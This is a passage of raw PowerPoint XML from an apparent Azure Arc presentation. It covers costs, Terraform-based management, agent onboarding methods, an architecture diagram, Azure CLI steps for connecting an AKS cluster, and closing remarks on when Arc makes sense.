              <a:t> for a single server (+/- $8)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Tittel 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12FE1902-5E28-B049-366D-B29669808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How much does it cost to use Azure Arc on a server?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="344260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B211-847A-F28B-5D13-083A6A1F4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Manage via Terraform (or Bicep!)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22DB8-9899-D110-CC3A-C6FC1AEE68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0183" y="1568155"/>
            <a:ext cx="5045778" cy="4538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2400" b="1" dirty="0"/>
              <a:t>Azure Arc for Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0"/>
              <a:t>Azure Policies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0"/>
              <a:t>Azure Monitoring Rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0"/>
              <a:t>Azure Data Collection Rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" b="1" dirty="0"/>
              <a:t>Onboarding/Agent install:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0"/>
              <a:t>Ansible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0"/>
              <a:t>Group Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0"/>
              <a:t>PowerShell Script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0"/>
              <a:t>ConfigMgr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="24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880551-641D-EFEC-A132-F578AF960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051" y="1550201"/>
            <a:ext cx="5696993" cy="238657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6423BFF-58B8-EAFF-631C-2869D16A8FFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5687995" y="3953873"/>
            <a:ext cx="60971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0A1B39"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>azurerm_monitor_data_collection_rule</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0A1B39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6D8C8-045C-1309-2434-91A090C0EEC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5679333" y="4290058"/>
            <a:ext cx="62094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 err="1">
                <a:solidFill>
                  <a:srgbClr val="0A1B39"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>azurerm_policy_set_definition</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0A1B39"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0A1B39"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49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F59F5F0-D4A2-C4F2-C9AA-AC347DE42E23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5672848" y="4581888"/>
            <a:ext cx="62613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A1B39"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>azurerm_monitor_scheduled_query_rules_alert_v2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A5625B-CCE8-0711-CA2D-A82BFF936C37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5675023" y="5741451"/>
            <a:ext cx="60971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Built-in policy definitions for Azure Arc-enabled servers - Azure Arc | Microsoft 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0881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87713AE4-BA15-43A4-ABCA-7BC3A485A07F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4118064" y="2679700"/>
            <a:ext cx="2498636" cy="558800"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow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400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Deployment and Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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50" y="364725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Support for Different PaaS services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DC86CE8-D064-4014-B026-221103176D2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6667500" y="1576769"/>
            <a:ext cx="4140200" cy="4603537"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1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0A1E64F-6C0B-4F3A-BC07-AFE7BB797678}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2324637" y="1557271"/>
            <a:ext cx="1745087" cy="4642491"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2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TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B1FD963-FA96-4901-B414-BE24853AEAC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819621" y="1108567"/>
            <a:ext cx="38057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400" b="1" dirty="0"/>
              <a:t>Microsoft Azure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1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A4BCDEC9-7C0A-4F91-BCFA-0F73851A82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9115" y="1799689"/>
            <a:ext cx="723900" cy="66675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48C7D848-28E0-45A0-BE30-9C609AFBDEF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2710646" y="2404951"/>
            <a:ext cx="11214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b="1"/>
              <a:t>Azure AD</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1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6376F4F-8473-4DDB-B772-620D9B818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2267" y="2734212"/>
            <a:ext cx="704850" cy="5524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3BACE1E-69F5-4771-AB00-BE578A3873B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2359383" y="3284114"/>
            <a:ext cx="16935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200" b="1"/>
              <a:t>Azure Resource Manager</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1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F21CC2C-AC75-4111-900B-973DA6AE70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484" y="1965437"/>
            <a:ext cx="762000" cy="58102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568E4F2-5C68-4DE4-A55C-49C011E67E04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4853279" y="2503868"/>
            <a:ext cx="1262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b="1"/>
              <a:t>Azure Arc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1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2BDD9072-155F-4296-A3DA-9624BA650F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3602" y="2391201"/>
            <a:ext cx="723900" cy="790575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Arrow: Right 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E82B7644-F8E7-46D6-A4DE-E4AE8753C8F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365431" y="2692400"/>
            <a:ext cx="927279" cy="509432"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="31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E3A946F-1097-4D35-89F5-0BEB72F20492}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251724" y="3205233"/>
            <a:ext cx="1756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b="1" dirty="0"/>
              <a:t>Administrators or Developers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1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586D3F5B-D5F7-4BE8-B812-0AE8508A6D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51429" y="4186361"/>
            <a:ext cx="914803" cy="840630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9BE3CACF-C72B-4692-8EE2-8A71F1DDC7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63436" y="4216927"/>
            <a:ext cx="638175" cy="638175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90455E5-E9F2-44D9-9710-84F65A4E333D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010927" y="4859243"/>
            <a:ext cx="20370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200" b="1" dirty="0"/>
              <a:t>Arc Fabric Controller</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0"/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77483B8E-AFF7-422B-8875-FB78341435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4893" y="3179657"/>
            <a:ext cx="638175" cy="638175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973A3ADA-7E86-45A8-9062-A7F274F9F351}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7204831" y="3775259"/>
            <a:ext cx="203700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050" b="1"/>
              <a:t>Arc Data Controller</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" b="1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08916F1-19AA-4FA6-8396-88798DF43EC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79033" y="3153723"/>
            <a:ext cx="919162" cy="56309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B0FA666F-A59E-4CF8-996C-B81A3B8A3947}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8318538" y="3700647"/>
            <a:ext cx="2037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000" b="1"/>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1000" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1000" b="1"/>
              <a:t>PostgreSQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1"/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D5E3115A-CAFF-44B2-9630-4D58A4173E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3146" y="2415904"/>
            <a:ext cx="2557462" cy="410318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="TextBox 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{267E1498-FEF5-4DAA-8AE9-AA2DCD964CA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7378872" y="5231737"/>
            <a:ext cx="29685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2000" b="1" dirty="0"/>
              <a:t>Resource Location</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" b="1" dirty="0"/>
              <a:t>(VMware, Azure Stack HCI, Azure, GCP, AWS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0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BF2B2519-6206-454D-87A4-6EA6BFD3910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874403" y="3898677"/>
            <a:ext cx="647700" cy="2228850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Arrow: Right 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{192BA9E3-3781-4DC2-A171-DD4365AB6AD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4112417" y="4642832"/>
            <a:ext cx="2447132" cy="618186"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill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4F03421-098C-401E-9563-CDD49027DAFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4788038" y="4265000"/>
            <a:ext cx="12621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sz="1400" dirty="0"/>
              <a:t>Logging and Monitoring</a:t>
            </a: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DAEDB5-6294-DD98-BD5A-2B11BFACCB2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7107678" y="1725038"/>
            <a:ext cx="32230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b-NO" dirty="0"/>
              <a:t>Web App, Functions, Logic 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8794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762D8-7E54-0CC2-2442-FB3D2C358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Kubernetes integration with Arc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20B63F-DE0E-9B3B-D782-4586B296317A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635540" y="1324613"/>
            <a:ext cx="11212749" cy="48628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/>
              <a:t>az</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> extension add --name connectedk8s </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>az</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> extension add --name k8s-extension </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>az</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> extension add --name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>customlocation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provider register --namespace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Microsoft.ExtendedLocation</a:t>
            </a:r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provider register --namespace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Microsoft.Kubernetes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>az</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> provider register --namespace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Microsoft.KubernetesConfiguration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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>aks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> create --resource-group arc-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>rg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> --name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>aks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> --node-count 3 --enable-addons monitoring --generate-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>-keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>az</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>aks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> get-credentials --resource-group arc-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>rg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> --name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>aks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connectedk8s connect --name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>azurearc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> --resource-group arc-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>rg</a:t>
            </a:r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connectedk8s enable-features -n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>azurearc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> -g arc-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>rg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> --features cluster-connect custom-locations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>az</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> k8s-extension create --name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>azdata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> --extension-type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>microsoft.arcdataservices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> --cluster-type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>connectedClusters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>azurearc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> -g arc-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>rg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> --scope cluster --release-namespace arc --config </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Microsoft.CustomLocation.ServiceAccount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>-bootstrapper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>az</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> connectedk8s show -n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>azurearc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> -g </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>aksrg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>  --query id -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>tsv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5" name="Rektangel: avrundede hjørner 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A49F6E71-C6E0-F809-4DFB-A2F5C3B2D160}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7983167" y="2153055"/>
            <a:ext cx="3114201" cy="797669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Set up a single AKS Cluster integrated with Arc for self-deployment of PaaS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rektangel: avrundede hjørner 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{548E1CE4-A2C7-11A8-3293-C9F93E8E224F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7953985" y="1151107"/>
            <a:ext cx="3114201" cy="797669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Supports multiple flavours of Kubernetes (k8s, k3s, AKS Edge Light)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6ED07E5B-63AC-0E09-1EAD-1E02D0815EDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="9829789">
            <a:off x="6898327" y="2637210"/>
            <a:ext cx="1216248" cy="667965"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow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Rektangel: avrundede hjørner 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D5FF318-0FEC-C206-1FC2-E414E7537F9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7814554" y="5285362"/>
            <a:ext cx="3114201" cy="797669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Set up of PaaS services is still a bit...clunky..</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33128027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CF0B73E-EEDA-269D-C455-A2D74E459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Want to try out Arc on your own?	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98EC86-02CF-8C17-9E3F-DFB5EACE0CB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503471" y="4608632"/>
            <a:ext cx="6096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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Azure Arc Jumpstart</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200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5076C961-0F6A-5E56-BAEC-165DD8FE5A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15" y="1347669"/>
            <a:ext cx="3692341" cy="3447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cBox architecture diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3C8968B-1DC4-26AA-14F4-1477D5265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146" y="1548472"/>
            <a:ext cx="6520199" cy="3667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7321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F7836A-4B9B-67B4-0411-6EF73D43FF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nb-NO" sz="2400" dirty="0"/>
              <a:t>Arc makes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>only sense </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0"/>
              <a:t>only if you have invested into the Azure ecosystem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0"/>
              <a:t>Monitoring, Patch Management, Security tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0"/>
              <a:t>Requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>building your own </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0"/>
              <a:t>logic for monitoring </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0"/>
              <a:t>You better get familiar with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kusto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>«Free» with WAC and SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0"/>
              <a:t>with Azure AD integration (at the moment...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0"/>
              <a:t>Much of the features are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
